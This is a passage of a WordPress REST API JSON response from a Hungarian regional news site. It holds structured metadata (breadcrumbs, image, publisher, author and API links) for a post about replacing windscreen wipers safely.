biztons\u00e1gosan?","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_1ablaktorlo.jpg","datePublished":"2025-05-16T12:54:30+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_1ablaktorlo.jpg","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/05\/zsumajpr01_1ablaktorlo.jpg","width":2240,"height":1260},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/05\/16\/mikor-es-hogyan-cserelje-le-az-ablaktorlot-biztonsagosan\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"Mikor \u00e9s hogyan cser\u00e9lje le az ablakt\u00f6rl\u0151t biztons\u00e1gosan?"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/71167","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=71167"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/71167\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media\/71169"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=71167"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=71167"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=71167"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}